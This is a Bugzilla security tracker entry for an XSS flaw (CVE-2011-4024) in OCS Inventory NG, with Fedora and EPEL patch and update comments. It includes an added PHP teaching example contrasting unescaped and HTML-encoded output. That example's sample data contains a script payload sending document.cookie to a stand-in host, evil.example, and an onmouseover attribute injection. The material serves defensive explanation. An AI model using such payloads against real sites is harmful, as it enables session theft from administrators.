Summary: CVE-2011-4024 ocsinventory: XSS flaw
Product: [Other] Security Response
Reporter: Vincent Danen <vdanen>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Version: unspecified
CC: fedora, jlieskov, xavier
Doc Type: Bug Fix
Story Points: ---
Last Closed: 2018-03-22 01:47:59 UTC
Type: ---
oVirt Team: ---
Cloudforms Team: ---
Description Vincent Danen 2011-10-21 22:20:34 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-4024 to the following vulnerability:

Name: CVE-2011-4024
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4024
Assigned: 20111006
Reference: EXPLOIT-DB:18005
Reference: http://www.exploit-db.com/exploits/18005
Reference: http://www.ocsinventory-ng.org/fr/accueil/nouvelles/version-2-0-2-stable.html
Reference: http://www.securityfocus.com/bid/50011
Reference: OSVDB:76135
Reference: http://osvdb.org/76135
Reference: SECUNIA:46311
Reference: http://secunia.com/advisories/46311
Reference: XF:ocsinventoryng-unspecified-xss(70406)
Reference: http://xforce.iss.net/xforce/xfdb/70406

Cross-site scripting (XSS) vulnerability in ocsinventory in OCS Inventory NG 2.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
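The CVE text above only identifies the bug class (XSS) and leaves the vector unspecified. The following PHP example is added here to illustrate that class in the kind of code an inventory console contains; it is not OCS Inventory NG's code and not the upstream patch, and the field names, the constructed sample records and the function names are assumptions. It renders attacker-influenced inventory values once unescaped and once HTML-encoded at the point of output, which is the fix that holds no matter where the data came from or whether it was cleaned before being stored.

```php
<?php
// Added illustration of the XSS bug class behind CVE-2011-4024.
// NOT OCS Inventory NG's code; the real vulnerable vector is unspecified.
// Field names, sample data and function names below are assumptions.
declare(strict_types=1);

// Constructed sample: inventory records as a server might receive them from
// agents. Whoever controls a reporting machine controls these values, so they
// are untrusted input even though they arrive through the agent channel.
const SAMPLE_INVENTORY = [
    ['name' => 'ws-0042', 'os' => 'Fedora release 15 (Lovelock)'],
    ['name' => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
     'os'   => 'x" onmouseover="alert(1)'],
];

// Vulnerable pattern: values are concatenated straight into the HTML response,
// so an attacker-supplied hostname becomes script that runs in the admin's
// browser, and a quote in an attribute value breaks out of the attribute.
function render_inventory_vulnerable(array $rows): string
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= '<tr><td>' . $row['name'] . '</td>'
               . '<td title="' . $row['os'] . '">' . $row['os'] . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened pattern: every untrusted value is HTML-encoded as it is written
// out. ENT_QUOTES also encodes single and double quotes, which is what keeps
// values inside attributes from escaping them; the explicit charset avoids
// surprises with multi-byte input.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_inventory_fixed(array $rows): string
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= '<tr><td>' . h($row['name']) . '</td>'
               . '<td title="' . h($row['os']) . '">' . h($row['os']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Self-check when run from the command line: the hardened output must contain
// neither a raw <script> tag nor the unescaped attribute-breaking quote.
if (PHP_SAPI === 'cli') {
    $bad  = render_inventory_vulnerable(SAMPLE_INVENTORY);
    $good = render_inventory_fixed(SAMPLE_INVENTORY);
    if (strpos($bad, '<script>') === false) {
        throw new RuntimeException('vulnerable renderer unexpectedly escaped its input');
    }
    if (strpos($good, '<script>') !== false || strpos($good, 'x" onmouseover') !== false) {
        throw new RuntimeException('hardened renderer leaked raw markup');
    }
    echo $good;
}
```

Run it with `php xss_example.php` (file name assumed) to see the encoded table; the check at the bottom fails loudly if either renderer behaves differently from what the comments claim. The point for a fix like the one shipped in 2.0.2 and backported to 1.3.3 is that encoding must happen in every template that echoes inventory data, not only in the one place an exploit was demonstrated.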
Comment 1 Vincent Danen 2011-10-21 22:23:14 UTC
I'm not sure that this affects Fedora (as we ship 1.3.3). Unfortunately, I am completely unable to find any patch for this and the upstream web site is really unhelpful. Since there is no contact info on the site, I'm currently trying to find someone on IRC who may have further information.
Comment 2 Remi Collet 2011-10-22 07:58:46 UTC
Bug also affects version 1.3.3. As an upgrade to 2.0.2 is not immediately possible (major code changes, bundled libraries, ...) I have written a patch, inspired by the 2.0.2 fix. I'm waiting for upstream feedback and will push a quick update soon. About this issue, GLPI, when synchronized with OCS, is not affected (data are properly cleaned before insertion into the GLPI DB).
Comment 3 Jan Lieskovsky 2011-10-25 13:39:07 UTC
This issue affects the versions of the ocsinventory package, as shipped with Fedora releases 14 and 15. -- This issue affects the versions of the ocsinventory package, as shipped within the Fedora EPEL 4, Fedora EPEL 5 and Fedora EPEL 6 repositories.
Comment 4 Jan Lieskovsky 2011-10-25 13:46:45 UTC
This issue has been scheduled to be corrected in the following updates:
1) ocsinventory-1.3.3-5.fc16
2) ocsinventory-1.3.3-5.fc15
3) ocsinventory-1.3.3-5.fc14
4) ocsinventory-1.3.3-5.el6
5) ocsinventory-1.3.3-5.el5
6) ocsinventory-1.3.3-5.el4
The above packages have been pushed to particular -testing repositories, and upon required level of testing they will be pushed to -stable repositories.
Comment 5 Jan Lieskovsky 2011-10-25 13:50:04 UTC
Relevant upstream patches for the server code (thanks to Remi Collet for providing those):
http://bazaar.launchpad.net/~ocsinventory-core/ocsinventory-ocsreports/stable-2.0/revision/789
http://bazaar.launchpad.net/~ocsinventory-core/ocsinventory-ocsreports/stable-2.0/revision/792
Comment 6 Fedora Update System 2011-11-05 01:18:37 UTC
ocsinventory-1.3.3-5.fc16 has been pushed to the Fedora 16 stable repository. If problems still persist, please make note of it in this bug report.
Comment 7 Fedora Update System 2011-11-14 00:52:03 UTC
ocsinventory-1.3.3-5.fc14 has been pushed to the Fedora 14 stable repository. If problems still persist, please make note of it in this bug report.
Comment 8 Fedora Update System 2011-11-14 00:53:47 UTC
ocsinventory-1.3.3-5.fc15 has been pushed to the Fedora 15 stable repository. If problems still persist, please make note of it in this bug report.
Comment 9 Fedora Update System 2011-11-14 18:56:58 UTC
ocsinventory-1.3.3-5.el4 has been pushed to the Fedora EPEL 4 stable repository. If problems still persist, please make note of it in this bug report.
Comment 10 Fedora Update System 2011-11-14 18:57:25 UTC
ocsinventory-1.3.3-5.el5 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.
Comment 11 Fedora Update System 2011-11-14 18:57:37 UTC
ocsinventory-1.3.3-5.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.